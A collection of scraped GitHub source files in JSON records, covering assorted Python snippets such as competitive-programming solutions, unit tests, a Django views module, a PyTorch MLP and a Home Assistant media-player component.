helper.fidelity_check.diff_delim + str(exData[key]))\n\t\t\t\tif (manual_verify):\n\t\t\t\t\tprint(\"\\t1\", end=\"\")\n\n\t\t\tif (manual_verify):\n\t\t\t\tprint()\n\t\t\toutput.append(cur_check)\n\n\t\tif (manual_verify):\n\t\t\tprint()\n\n\t\t# sort output by key name to ensure consistency\n\t\toutput = sorted(output, key=lambda x: x.getName()) \n\t\treturn fileAnalysis(exFileName, fileSuffix, task, scanType, subID,runNum, output)\n\n\t# assuming objects have been interpreted at this point\n\t# takes two objects, that is, a piece of text, a number, or an array of either and tests their equality\n\t# these objects are the values of the fields from the template json and the experimental data\n\tdef compareObjects(self, exOb, templateOb):\n\n\t\t# compare each element of a list\n\t\tif type(exOb) == list and type(templateOb) == list:\n\t\t\tindicies = []\n\t\t\tfor i in range(len(templateOb)):\n\t\t\t\tif self._compareObjects(exOb[i], templateOb[i]) == False:\n\t\t\t\t\tindicies.append(i)\n\t\t\n\t\t\tif len(indicies) == 0:\n\t\t\t\treturn (True, None)\n\t\t\telse:\n\t\t\t\treturn (False, indicies)\n\t\t\t\n\t\telif type(exOb) == list or type(templateOb) == list:\n\t\t\treturn (False, None)\n\t\telse:\n\t\t\treturn (self._compareObjects(exOb, templateOb), None)\n\n\tdef _num_in_tol(self, num1, num2):\n\t\treturn num1 < num2 + TOL and num1 > num2 - TOL\n\n\tdef _compareObjects(self, exOb, templateOb):\n\n\t\tif type(templateOb) == str and type(exOb) != str:\n\t\t\t# get number in template object\n\t\t\tnum = float(templateOb[:-1])\n\t\t\tif templateOb[-1] == \"+\":\n\t\t\t\tif self._num_in_tol(num, exOb) or num < exOb:\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\treturn False\n\t\telif type(templateOb) == str and type(exOb) == str:\n\t\t\tif exOb == templateOb:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn exOb.replace(\"-\",\"_\") == templateOb.replace(\"-\",\"_\")\n\t\telse:\n\t\t\treturn self._num_in_tol(exOb, templateOb)\n\t\t\t\t\n","repo_name":"UNCDEPENdLab/fmriprep_pipeline","sub_path":"mri_fidelity_checks/mri_fidelity_checks/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":9525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"20546713552","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('9958E83F5A6C4B6D30.jpg', 0)\n\nprint(img.shape)\n\nx, y = img.shape\n\nprint(x)\nprint(y)\n\n_x = 64\n_y = 64\nk = 0\n\n# 이미지 하나씩 자르기\nfor i in range(0, y, _y):\n for j in range(0, x, _x):\n k = k + 1\n if k == 5:\n testimg = img[i:i+_x, j:j+_y]\n cv2.imshow('testimage',testimg)\n\n\n\n\ncv2.imshow('image',img)\ncv2.waitKey(0)","repo_name":"donaldaq/opencv","sub_path":"codes/cropped.py","file_name":"cropped.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27389979402","text":"from collections import Counter\nfrom statistics import mean\n\nfrom consistent_hash import ConsistentHash, Node\nfrom faker import Faker\n\n\ndef test_get_node_of_key_successfully():\n # given\n consistent_hash = ConsistentHash(\n nodes=[\n Node(id=\"1\"),\n Node(id=\"2\"),\n Node(id=\"3\"),\n ],\n )\n faker = Faker()\n\n n_data = 10\n for _ in range(n_data):\n\n # when\n key = faker.email()\n node = consistent_hash.get_node_of_key(key)\n\n # then\n assert node.id in [\"1\", \"2\", \"3\"]\n\n\ndef test_get_node_of_key_should_divide_the_keys_evenly():\n # given\n nodes = [\n Node(id=\"1\"),\n Node(id=\"2\"),\n Node(id=\"3\"),\n ]\n consistent_hash = ConsistentHash(nodes=nodes)\n faker = Faker()\n node_ids = []\n\n # when\n n_data_per_node = 100\n n_data = n_data_per_node * len(nodes)\n for _ in range(n_data):\n key = faker.email()\n node = consistent_hash.get_node_of_key(key)\n node_ids.append(node.id)\n\n # then\n counter = Counter(node_ids)\n print(counter)\n error_rate = 0.20\n lower_bound = n_data_per_node - int(n_data_per_node * error_rate)\n upper_bound = n_data_per_node + int(n_data_per_node * error_rate)\n expected_values = list(range(lower_bound, upper_bound))\n assert counter[\"1\"] in expected_values\n assert counter[\"2\"] in expected_values\n assert counter[\"3\"] in expected_values\n\n\ndef test_consistent_hash_do_after_add_a_node_successfully():\n n_test = 100\n n_diffs = []\n faker = Faker()\n n_data = 100\n initial_data = [faker.email() for _ in range(n_data)]\n n_nodes = 3\n nodes = [Node(id=str(i)) for i in range(1, n_nodes + 1)]\n for _ in range(n_test):\n consistent_hash = ConsistentHash(nodes)\n initial_key_to_node = {}\n for key in initial_data:\n node = consistent_hash.get_node_of_key(key)\n initial_key_to_node[key] = node\n\n consistent_hash.add_node(Node(id=\"4\"))\n after_key_to_node = {}\n for key in initial_data:\n node = consistent_hash.get_node_of_key(key)\n after_key_to_node[key] = node\n\n n_diff = 0\n for key in initial_data:\n if initial_key_to_node[key] != after_key_to_node[key]:\n n_diff += 1\n n_diffs.append(n_diff)\n\n error_rate = 0.35\n expected_diff = int(len(initial_data) / 4)\n lower_bound = expected_diff - int(expected_diff * error_rate)\n upper_bound = expected_diff + int(expected_diff * error_rate)\n expected_values = list(range(lower_bound, upper_bound))\n assert int(mean(n_diffs)) in expected_values\n","repo_name":"heumsi/implementing-system-design-interview","sub_path":"05-design-consistent-hashing/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"5144811998","text":"# when writing a function you can define a default value\r\n# if an argument for a parameter is provided in the functional call python uses the argument value\r\n\r\ndef describe_pet( pet_name, animal_type = \"dog\"):\r\n \"\"\"Display information about a pet\"\"\"\r\n print(\"\\nI have a \" + animal_type + \".\")\r\n print(\"My \" + animal_type + \"'s name is \" + pet_name.title() + \".\")\r\n\r\ndescribe_pet(pet_name= \"wes\")\r\ndescribe_pet(animal_type= \"turtle\", pet_name= \"terry the turtle\") # in order to change animal_type it first must ...\r\n# ... be defined","repo_name":"JamCrumpet/Lesson-notes","sub_path":"Lesson 7 function/7.8_default_values.py","file_name":"7.8_default_values.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"9530466881","text":"\nfrom multiprocessing import Pool\n\np = Pool(4)\n\n#make local directories if they don't exist\ndef make_dir(directory):\n\tif not os.path.exists(directory):\n\t\tos.makedirs(directory)\n\n#get all subdirs\n\nimport os, glob\nsrcdir = \"xml\"\ndstdir = \"/media/backup/aps/xml/\"\n\nsrcfolders = []\nfor root, dirs, files in os.walk(srcdir):\n\t#make folder copies at the destination so they exist\n\tsrcfolders.extend(dirs)\n\tbreak\n\nfor f in srcfolders[0]:\n\tnewroot = dstdir + f\n\t#make_dir(newroot)\n\tdstpattern = \"xml/\" + f + \"/*.xml\"\n\tsource_files = glob.glob(dstpattern)\n\tdest_files = [i.replace(srcdir+\"/\", dstdir) for i in source_files]\n\t\n\n#for each directory, copyfile in parallel \np.map(f, args=(srcfolders, dstfolders))\n","repo_name":"mjlavin80/aps-elastic-scripts","sub_path":"copy-json.py","file_name":"copy-json.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"5371398706","text":"# 키로거\n# https://www.acmicpc.net/problem/5397\n# Stack 2개 이용\n\n\ndef getKey(s):\n beforeCursor = []\n afterCursor = []\n for token in s:\n if token == '>':\n if afterCursor:\n beforeCursor.append(afterCursor.pop())\n elif token == '<':\n if beforeCursor:\n afterCursor.append(beforeCursor.pop())\n elif token == '-':\n if beforeCursor:\n beforeCursor.pop()\n else:\n beforeCursor.append(token)\n return \"\".join(beforeCursor) + \"\".join(reversed(afterCursor))\n\n\ntestCaseNum = int(input())\n\nfor _ in range(testCaseNum):\n s = input()\n key = getKey(s)\n print(key)\n","repo_name":"YimJiYoung/Daily-DataStructure-Algorithm","sub_path":"DataStructure/Stack_Queue/키로거.py","file_name":"키로거.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20159703720","text":"with open(\"7/rules.txt\") as f:\n rules = f.readlines()\n\n\ndef get_containers(color: str):\n res = []\n for rule in rules:\n if color in rule:\n rule = rule.strip().split(\" \")\n res.append(rule[0] + \" \" + rule[1])\n return res\n\n\n# def check(color: str):\n# result = list(set(get_containers(color)))\n# print(\"Res: \", result)\n# if len(result) == 0:\n# return 0\n# else:\n# num = 0\n# for res in result:\n# if res == color:\n# num -= 1\n# continue\n# num += check(res)\n# return len(result) + num\n\ndef check(color: str):\n print(\"Color: \", color)\n result = list(set(get_containers(color)))\n result.remove(color)\n print(\"Result: \", result)\n\n if len(result) < 1:\n return []\n\n temp = []\n for res in result:\n temp.extend(set(check(res)))\n result.extend(temp)\n return list(set(result))\n\n\nres = check(\"shiny gold\")\nprint(\"Result: \", len(res))\n","repo_name":"vaerl/advent-of-code-2020","sub_path":"7/rules-1.py","file_name":"rules-1.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"5062810333","text":"#!/usr/bin/env python3\nimport sys\n\n\ndef solve(N: int, M: int, C: \"List[str]\", D: \"List[str]\", P: \"List[int]\"):\n d = {}\n for i in range(M):\n d[D[i]] = P[i + 1]\n ans = 0\n for cc in C:\n if cc not in d:\n ans += P[0]\n else:\n ans += d[cc]\n print(ans)\n\n return\n\n\n# Generated by 2.12.0 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. You can remove this line by using your custom template)\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n N = int(next(tokens)) # type: int\n M = int(next(tokens)) # type: int\n C = [next(tokens) for _ in range(N)] # type: \"List[str]\"\n D = [next(tokens) for _ in range(M)] # type: \"List[str]\"\n P = [int(next(tokens)) for _ in range(M + 1)] # type: \"List[int]\"\n solve(N, M, C, D, P)\n\nif __name__ == '__main__':\n main()\n","repo_name":"K53/atcoder-workspace","sub_path":"abc308/B/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"33554381112","text":"# pylint: disable=unused-variable\nfrom aiohttp import web\nimport pytest\n\n\n@pytest.mark.parametrize(\n ['params'],\n [\n ({'lines': ['first', 'second'], 'logins': ['user_1']},),\n ({'logins': ['user_2']},),\n ({'lines': ['first', 'new']},),\n ({},),\n ],\n)\nasync def test_chatterbox_stats(web_app_client, params, mock_chatterbox_py3):\n @mock_chatterbox_py3('/v1/users/statuses', prefix=True)\n def handler(request):\n assert request.query.getall('lines', []) == params.get('lines', [])\n assert request.query.getall('logins', []) == params.get('logins', [])\n return web.json_response(\n {\n 'users': [\n {\n 'current_status': 'online',\n 'time_spent_in_status': 60,\n 'login': 'user_1',\n 'lines': ['first', 'second'],\n },\n {\n 'current_status': 'offline',\n 'time_spent_in_status': 120,\n 'login': 'user_2',\n 'lines': ['new'],\n },\n ],\n },\n )\n\n params_to_send = {}\n for key, value in params.items():\n if isinstance(value, list):\n value = '|'.join(value)\n params_to_send[key] = value\n response = await web_app_client.get(\n '/v1/chatterbox/users/stat', params=params_to_send,\n )\n data = await response.json()\n\n assert data == {\n 'users': [\n {\n 'current_status': 'online',\n 'time_spent_in_status': 60,\n 'login': 'user_1',\n 'lines': ['first', 'second'],\n },\n {\n 'current_status': 'offline',\n 'time_spent_in_status': 120,\n 'login': 'user_2',\n 'lines': ['new'],\n },\n ],\n }\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_support_metrics/web/test_get_users_stat.py","file_name":"test_get_users_stat.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"73871887890","text":"with open(\"input.txt\") as f:\n count = 0\n for line in f.readlines():\n line = line[:-1]\n vals = line.split(\",\")\n a = vals[0].split(\"-\")\n b = vals[1].split(\"-\")\n\n alo = int(a[0])\n ahi = int(a[1])\n\n blo = int(b[0])\n bhi = int(b[1])\n\n # a\n if (alo <= blo and ahi >= bhi) or (blo <= alo and bhi >= ahi):\n count += 1\n\n # b\n # if not (ahi < blo or bhi < alo):\n # count += 1\n\n print(count)\n","repo_name":"david-j-xu/2022-Advent-of-Code","sub_path":"04/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"37236076437","text":"from leads.models import Lead,Suggestion,List,Favorite\nfrom leads.serializers import LeadSerializer,SuggestionSerializer,ListSerializer,FavoriteSerializer,AddFavoriteSerializer,MyFavoriteSerializer\nfrom rest_framework import generics\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.http import HttpResponse, JsonResponse\nfrom rest_framework.parsers import JSONParser\nfrom leads.scrape import get_data\n\n\nclass LeadListCreate(generics.ListCreateAPIView):\n queryset = Lead.objects.all()\n serializer_class = LeadSerializer \n\nclass SuggestionListCreate(generics.ListCreateAPIView):\n queryset = Suggestion.objects.all()\n serializer_class = SuggestionSerializer \n\nclass ListListCreate(generics.ListCreateAPIView):\n queryset = List.objects.all()\n serializer_class = ListSerializer \n\nclass FavoriteListCreate(generics.ListCreateAPIView):\n queryset = Favorite.objects.all()\n serializer_class = FavoriteSerializer \n\nclass SuggestionGet(generics.RetrieveAPIView):\n queryset = Suggestion.objects.all()\n serializer_class = SuggestionSerializer \n\n# class FavoriteGet(generics.RetrieveAPIView):\n# queryset = Favorite.objects.all()\n# serializer_class = FavoriteSerializer \n\n\n@csrf_exempt\ndef my_favorites(request):\n if not request.user.is_authenticated:\n return JsonResponse(status=403)\n\n if request.method == 'GET':\n #id = request.user.id\n favorites = Favorite.objects.filter(author__exact=request.user)\n serializer = MyFavoriteSerializer(favorites, many=True)\n return JsonResponse(serializer.data, safe=False)\n\n@csrf_exempt\ndef add_favorite(request):\n if not request.user.is_authenticated:\n auth=dict()\n auth['message']='No authentification'\n return JsonResponse(auth, status=403)\n\n if request.method == 'POST':\n data = JSONParser().parse(request)\n data['author'] = request.user.id\n data['list'] = '1'\n #TODO: now always first list, later need to think which id to take\n # data['list_id'] = '1' #List.objects.get(pk=1).id\n serializer = FavoriteSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n\n@csrf_exempt\ndef is_auth(request):\n auth_data = dict()\n if request.user.is_authenticated:\n auth_data['auth'] = True\n user_data = dict()\n user_data['username']=request.user.username\n auth_data['user'] = user_data\n else:\n auth_data['auth'] = False\n return JsonResponse(auth_data, status=200)\n\n@csrf_exempt\ndef add_suggestion(request):\n if not request.user.is_authenticated:\n return JsonResponse(status=401)\n\n if request.method == 'POST':\n data = JSONParser().parse(request)\n data['author'] = request.user.id\n\n webpage_data = get_data(data['link'])\n if webpage_data['title']:\n data['title'] = webpage_data['title']\n\n if webpage_data['description']:\n dots_mark = '..'\n if len(webpage_data['description']) < 295:\n dots_mark = ''\n data['description'] = webpage_data['description'][:295] + dots_mark \n else:\n data['description'] = webpage_data['title']\n\n if webpage_data['keywords']:\n data['keywords'] = webpage_data['keywords'][:295]\n \n\n #TODO: get image from webpage\n if webpage_data['type']=='youtube':\n #get image\n data['image']=data['link']\n else:\n data['image']=data['link']\n\n\n #TODO: add to model: keywords and author (just to see who is using it)\n #get data from POST request\n #get data from webpage, if it exists, if there is some data etc\n # save the suggestion\n # save the same suggestion to users favorites\n\n # import pdb;pdb.set_trace()\n serializer = SuggestionSerializer(data=data)\n if serializer.is_valid():\n serializer.save()\n return JsonResponse(serializer.data, status=201)\n return JsonResponse(serializer.errors, status=400)\n","repo_name":"arvis/langlearn","sub_path":"project/leads/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"30130750934","text":"import torch\nfrom torch import nn \nfrom torch.nn import init\nimport numpy as np\nimport sys\nsys.path.append(\"..\") \nimport d2lzh_pytorch as d2l\n#构建网络\nnum_inputs, num_outputs, num_hiddens = 784, 10, 256\nnet = nn.Sequential(\n d2l.FlattenLayer(),\n nn.Linear(num_inputs,num_hiddens),\n nn.ReLU(),\n nn.Linear(num_hiddens,num_outputs)\n)\n#初始化参数\nfor params in net.parameters():\n init.normal_(params,mean=0,std=0.01)\n#定义损失函数\nloss = nn.CrossEntropyLoss()#分开定义softmax运算和交叉熵损失函数可能会造成数值不稳定,pytorch提供了包括softmax运算和交叉熵损失计算的函数\n#定义优化器\noptimizer = torch.optim.SGD(net.parameters(), lr=0.5)\n#读取数据\nbatch_size = 256\ntrain_iter, test_iter = d2l.load_data_fashion_mnist(batch_size)\n#训练模型\nnum_epochs = 5\nd2l.train_ch3(net, train_iter, test_iter, loss, num_epochs, batch_size, None, None, optimizer)","repo_name":"zhangsx19/pytorch-exercise","sub_path":"MLPpytorch实现.py","file_name":"MLPpytorch实现.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"41073512218","text":"from typing import List\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\nclass Solution:\n def inorderTraversal(self, root: TreeNode) -> List[int]:\n if root == None:\n return []\n if root.left == None and root.right == None:\n return [root.val]\n ret = []\n if root.left:\n ret.extend(self.inorderTraversal(root.left))\n ret.append(root.val)\n if root.right:\n ret.extend(self.inorderTraversal(root.right))\n return ret\n\n","repo_name":"felixchr/leetcode","sub_path":"p0094_binary_tree_inorder_travesal.py","file_name":"p0094_binary_tree_inorder_travesal.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"74422224849","text":"\"\"\"\nSupport for interface with a AnthemAV Receiver.\n\nFor more details about this platform, please refer to the documentation at\nhttps://home-assistant.io/components/media_player/\n\"\"\"\nimport logging\nimport socket\nimport select\nimport time\nimport re\nimport voluptuous as vol\n\n\nfrom homeassistant.components.media_player import (\n SUPPORT_TURN_OFF, SUPPORT_VOLUME_MUTE, SUPPORT_VOLUME_SET,\n SUPPORT_SELECT_SOURCE, SUPPORT_VOLUME_STEP, MediaPlayerDevice,\n PLATFORM_SCHEMA)\nfrom homeassistant.const import (\n CONF_HOST, CONF_NAME, STATE_OFF, STATE_ON, STATE_UNKNOWN, CONF_PORT)\nimport homeassistant.helpers.config_validation as cv\n\n_LOGGER = logging.getLogger(__name__)\n\nDEFAULT_NAME = 'AnthemAV'\nDEFAULT_MRXZONE = 1\nCONF_MRXZONE = \"mrxzone\"\nCONF_MINVOL = \"minvol\"\nCONF_MAXVOL = \"maxvol\"\nDEFAULT_MINVOL = -60\nDEFAULT_MAXVOL = -30\n# CONF_TIMEOUT = \"timeout\"\n# CONF_BUFFER_SIZE = \"buffer_size\"\n# DEFAULT_TIMEOUT = 10\n# DEFAULT_BUFFER_SIZE = 1024\n# mrx_payload = \"payload\"\nCONF_MRXMODEL = \"mrxmodel\"\nDEFAULT_MRXMODEL = \"x00\"\n\nSUPPORT_ANTHEMMRX = SUPPORT_SELECT_SOURCE | SUPPORT_VOLUME_STEP | \\\n SUPPORT_VOLUME_SET | SUPPORT_VOLUME_MUTE | SUPPORT_TURN_OFF\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required(CONF_HOST): cv.string,\n vol.Required(CONF_PORT): cv.port,\n vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,\n vol.Optional(CONF_MRXMODEL, default=DEFAULT_MRXMODEL): cv.string,\n vol.Optional(CONF_MRXZONE, default=DEFAULT_MRXZONE): cv.positive_int,\n vol.Optional(CONF_MINVOL, default=DEFAULT_MINVOL): vol.Coerce(float),\n vol.Optional(CONF_MAXVOL, default=DEFAULT_MAXVOL): vol.Coerce(float),\n # vol.Optional(CONF_TIMEOUT, default=DEFAULT_TIMEOUT): cv.positive_int,\n})\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Setup the AnthemAV platform.\"\"\"\n add_devices([AnthemAV(hass, config)])\n return True\n\n\nclass AnthemAV(MediaPlayerDevice):\n \"\"\"Representation of a AnthemAV Receiver.\"\"\"\n\n def __init__(self, hass, config):\n \"\"\"Initialize the AnthemAV device.\"\"\"\n\n self._name = config.get(CONF_NAME)\n self._muted = None\n self._volume = 0\n self._state = STATE_UNKNOWN\n self._response = None\n self._lastupdatetime = None\n self._selected_source = ''\n self._source_name_to_number = {v: k for k,\n v in mrx_sources.items()}\n self._source_number_to_name = mrx_sources\n self._config = {\n CONF_NAME: config.get(CONF_NAME),\n CONF_HOST: config[CONF_HOST],\n CONF_PORT: config[CONF_PORT],\n CONF_MRXZONE: config.get(CONF_MRXZONE, DEFAULT_MRXZONE),\n CONF_MINVOL: config.get(CONF_MINVOL, DEFAULT_MINVOL),\n CONF_MAXVOL: config.get(CONF_MAXVOL, DEFAULT_MAXVOL),\n CONF_TIMEOUT: config.get(CONF_TIMEOUT, DEFAULT_TIMEOUT),\n CONF_BUFFER_SIZE: config.get(\n CONF_BUFFER_SIZE, DEFAULT_BUFFER_SIZE),\n }\n self.update()\n\n def update(self):\n \"\"\"Retrieve the latest data.\"\"\"\n\n @property\n def source(self):\n \"\"\"Return the current input source.\"\"\"\n return self._selected_source\n\n @property\n def source_list(self):\n \"\"\"List of available input sources.\"\"\"\n return list(self._source_name_to_number.keys())\n\n def select_source(self, source):\n \"\"\"Select input source.\"\"\"\n _LOGGER.info(\"Select Source: %s\",\n self._source_name_to_number.get(source))\n\n @property\n def name(self):\n \"\"\"Return the name of the device.\"\"\"\n return self._name\n\n @property\n def state(self):\n \"\"\"Return the state of the device.\"\"\"\n return self._state\n\n @property\n def volume_level(self):\n \"\"\"Volume level of the media player (0..1).\"\"\"\n return self._volume\n\n @property\n def is_volume_muted(self):\n \"\"\"Boolean if volume is currently muted.\"\"\"\n return self._muted\n\n @property\n def supported_media_commands(self):\n \"\"\"Flag of media commands that are supported.\"\"\"\n return SUPPORT_ANTHEMMRX\n\n def turn_off(self):\n \"\"\"Turn off media player.\"\"\"\n\n def turn_on(self):\n \"\"\"Turn off media player.\"\"\"\n\n def volume_up(self):\n \"\"\"Volume up the media player.\"\"\"\n\n def volume_down(self):\n \"\"\"Volume down media player.\"\"\"\n\n def mute_volume(self, mute):\n \"\"\"Send mute command.\"\"\"\n\n def set_volume_level(self, volume):\n \"\"\"Set volume level, range 0..1.\"\"\"\n mrxvol = int(((self._config[CONF_MAXVOL]\n - self._config[CONF_MINVOL])\n * volume) - (0 - self._config[CONF_MINVOL]))\n\n\n\n# new class for mrx control\n\n # object for each model type with commands and regex\n # volume_up\n # volume_down\n # volume_set\n # volume_get\n # power_on\n # power_off\n # power_get\n # mute_on\n # mute_off\n # mute_toggle\n # mute_get\n # source_set\n # source_get\n\n# Use regex with named groups\n# >>> m = re.match(r\"(?P\\w+) (?P\\w+)\", \"Malcolm Reynolds\")\n# >>> m.group('first_name')\n# 'Malcolm'\n# >>> m.group('last_name')\n# 'Reynolds'\n# combine dictionary\n\n# Use format tags\n\n# use server client method like squeezebox to limit polling of mrx\n\n # # initialise mrx:\n # mrx.initialise(host, port, model)\n # mrx.initialise(192.168.2.200, 4998, 'x00')\n # models: x00, x10, x20\n\n # # store mrx response in object:\n # mrx.state.[zone].[state]\n # mrx.state.[1].volume = -60\n # mrx.state.[1].mute = 0\n # mrx.state.[1].source = 3\n # mrx.state.[1].power = 1\n # store timestamp of last received command\n\n # # commands:\n # mrx.[command](zone, value)\n # mrx.setvolume(1, -60)\n # mrx.setsource(1, 1), use source numbers\n # mrx.setmute(1, 0), options 0, 1, T\n # mrx.setpower(1, 1), options 0, 1\n\n # # Update:\n # mrx.update()\n # optional: limit to 5 seconds since last complete set of information\n\n # # Socket connection:\n # Current: open, send, receive, close every command.\n # optional: open socket connection and watch all responses.\n","repo_name":"tinglis1/anthemav","sub_path":"_HA Component/anthemav.py","file_name":"anthemav.py","file_ext":"py","file_size_in_byte":6277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"73424511249","text":"#2048(Easy)\n'''\ndfs()함수 다시 이해해보기\ndfs 알고리즘 공부 필요!!\n재귀함수 너무 어렵다..\n'''\nimport sys,copy\n\ndef move(direction):\n if direction==0: #위쪽 방향으로 이동\n for j in range(n):\n idx=0 #0행부터 차례대로 검사하기 위한 변수\n for i in range(1,n):\n if board[i][j]: #0이 아니라면\n temp=board[i][j] #temp에 값 일시 저장\n board[i][j]=0 #블럭이 옮겨졌다고 생각하고 0으로 수정\n if board[idx][j]==0: #위쪽이 비어있으면\n board[idx][j]=temp #저장한 temp값을 위쪽으로 옮김\n elif board[idx][j]==temp: #저장한 값과 위쪽에 있는 값이 같으면\n board[idx][j]=temp*2 #블록 합침\n idx+=1 #그 다음 행을 탐색하기 위해서\n else: #위쪽이 비어있지도, 같은 블럭도 아니라면\n idx+=1 #그 위에 블럭을 쌓아야 하기 때문에 idx먼저 증가 시킨 후\n board[idx][j]=temp #임시저장한 값을 그대로 다시 보드에 넣음\n\n elif direction == 1: #아래로 이동\n for j in range(n):\n idx = n - 1 #보드의 맨 아래 행\n for i in range(n - 2, -1, -1):\n if board[i][j]: #옮길 블럭이 있다면\n temp = board[i][j] #temp에 값 일시 저장 후\n board[i][j] = 0 #블럭을 옮겼다 치고 0으로 수정\n if board[idx][j] == 0: #비어있다면\n board[idx][j] = temp #임시저장한 값 넣음 (아래로 이동)\n elif board[idx][j] == temp: #옮길 값(temp)와 아래에 있는 블럭이 같다면\n board[idx][j] = temp * 2 #블럭 합침\n idx -= 1 #블럭이 쌓임\n else:\n idx -= 1\n board[idx][j] = temp\n\n elif direction == 2: #왼쪽으로 이동\n for i in range(n):\n idx = 0 #열을 나타 냄\n for j in range(1, n):\n if board[i][j]:\n temp = board[i][j]\n board[i][j] = 0\n if board[i][idx] == 0:\n board[i][idx] = temp\n elif board[i][idx] == temp:\n board[i][idx] = temp * 2\n idx += 1\n else:\n idx += 1\n board[i][idx] = temp\n\n else: #오른쪽으로 이동\n for i in range(n):\n idx = n - 1\n for j in range(n - 2, -1, -1):\n if board[i][j]:\n temp = board[i][j]\n board[i][j] = 0\n if board[i][idx] == 0:\n board[i][idx] = temp\n elif board[i][idx] == temp:\n board[i][idx] = temp * 2\n idx -= 1\n else:\n idx -= 1\n board[i][idx] = temp\n\ndef dfs(count):\n global maxBlock,board\n if count==5: #최대 5번 움직였다면 멈추고 전체 배열의 최대 값을 반환\n for i in range(n):\n for j in range(n):\n maxBlock=max(maxBlock,board[i][j])\n return\n copyBoard=copy.deepcopy(board) #이동 전 보드의 상태 저장\n for i in range(4):\n move(i) #move()함수로 이동 뒤\n dfs(count+1) #재귀적으로 호출\n board=copy.deepcopy(copyBoard)\n\nn=int(sys.stdin.readline())\nboard=[]\nfor i in range(n):\n board.append(list(map(int,sys.stdin.readline().split())))\nmaxBlock=0\ndfs(0)\nprint(maxBlock)","repo_name":"dbswl4951/baekjoon_algorithm","sub_path":"backjoon_algorithm/implementation/ex12100.py","file_name":"ex12100.py","file_ext":"py","file_size_in_byte":3887,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
+{"seq_id":"16682343267","text":"#!/usr/bin/python3\n\"\"\"This script will check utf-8 validity\"\"\"\n\n\ndef validUTF8(data):\n \"\"\"This script will return true if given list is a valid UTF-8\"\"\"\n num_bytes = 0\n for i in range(len(data)):\n bits = format(data[i], '#010b')[-8:]\n if bits[0] == '0':\n continue\n else:\n for bit in bits:\n if bit != '0':\n num_bytes += 1\n else:\n break\n if num_bytes == 1 or num_bytes >= 5:\n return False\n if (num_bytes > 1 and num_bytes <= 4):\n after_byte = i + 1\n last_byte = i + num_bytes\n if (after_byte > len(data) or last_byte > len(data)):\n return False\n for j in range(after_byte, last_byte):\n new_bits = format(data[j], '#010b')[-8:]\n if not (new_bits[0] == '1' and new_bits[1] == '0'):\n return False\n else:\n continue\n return True\n return True\n","repo_name":"samie-ya/alx-interview","sub_path":"0x04-utf8_validation/0-validate_utf8.py","file_name":"0-validate_utf8.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"}
